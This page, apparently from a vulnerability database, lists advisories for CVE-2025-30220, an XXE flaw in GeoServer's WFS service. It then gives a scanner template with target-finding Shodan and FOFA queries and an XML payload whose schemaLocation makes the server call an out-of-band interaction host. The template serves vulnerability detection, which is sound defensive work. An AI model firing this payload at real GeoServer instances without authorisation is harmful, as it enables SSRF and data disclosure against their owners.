| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability in the GeoServer Web Feature Service (WFS) software, used for managing and publishing geospatial data on the OSGeo GeoServer server, allows a perpetrator to disclose protected information. | 29 Aug 202500:00 | – | bdu_fstec | |
| CVE-2025-30220 | 10 Jun 202515:31 | – | circl | |
| GeoServer 代码问题漏洞 | 10 Jun 202500:00 | – | cnnvd | |
| CVE-2025-30220 | 10 Jun 202515:16 | – | cve | |
| CVE-2025-30220 GeoTools, GeoServer, and GeoNetwork XML External Entity (XXE) Processing Vulnerability in XSD schema handling | 10 Jun 202515:16 | – | cvelist | |
| EUVD-2025-17683 | 3 Oct 202520:07 | – | euvd | |
| [XBOW-025-068] XML External Entity (XXE) Processing Vulnerability in GeoServer WFS Service | 10 Jun 202520:10 | – | github | |
| Vulnerability fixed in GeoServer | 18 Jun 202510:17 | – | ncsc | |
| CVE-2025-30220 | 10 Jun 202516:15 | – | nvd | |
| CVE-2025-30220 GeoTools, GeoServer, and GeoNetwork XML External Entity (XXE) Processing Vulnerability in XSD schema handling | 10 Jun 202515:16 | – | osv |
id: CVE-2025-30220
info:
name: GeoServer WFS - XXE Processing Vulnerability
author: iamnoooob,pdresearch,darses
severity: critical
description: |
GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
impact: |
Unauthenticated attackers can exploit XXE vulnerabilities in GeoServer WFS to perform OOB data exfiltration and SSRF attacks, potentially accessing internal services and sensitive data.
remediation: |
Upgrade to the latest GeoServer version that properly disables external entity processing in WFS requests.
reference:
- https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
- https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
- https://github.com/geonetwork/core-geonetwork/pull/8757
- https://github.com/geonetwork/core-geonetwork/pull/8803
- https://github.com/geonetwork/core-geonetwork/pull/8812
- https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cve-id: CVE-2025-30220
cwe-id: CWE-611
epss-score: 0.50825
epss-percentile: 0.9879
metadata:
verified: true
max-request: 8
vendor: osgeo
product: geoserver
shodan-query:
- title:"geoserver"
- 'http.html_hash:1093634893 "Content-Disposition: inline"'
- http.favicon.hash:97540678
- html:"/geoserver/"
fofa-query:
- title="geoserver"
- app="geoserver"
- icon_hash="97540678"
- body="/geoserver/"
tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"
stop-at-first-match: true
matchers:
- type: dsl
internal: true
dsl:
- 'contains(body, "wfs:WFS_Capabilities")'
- 'contains(content_type, "application/xml")'
- "status_code == 200"
condition: and
extractors:
- type: xpath
name: featuretype
internal: true
xpath:
- /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name
- method: POST
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS"
- "{{BaseURL}}/geoserver/ows?service=WFS"
- "{{BaseURL}}/wfs?service=WFS"
- "{{BaseURL}}/ows?service=WFS"
stop-at-first-match: true
headers:
Content-Type: "application/xml;charset=UTF-8"
body: |
<wfs:GetFeature service="WFS" version="1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
<wfs:Query typeName="{{featuretype}}"/>
</wfs:GetFeature>
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "java.lang.NullPointerException")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450221009e4f2b5f80c7b3b4a9834cd9581e974abcfa527053e422aaaa11585e316e93b802201d736d79adcf207bb1e79e6e0203fe2a22dd68c06b0b9ea6d1aed3331aedf736:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation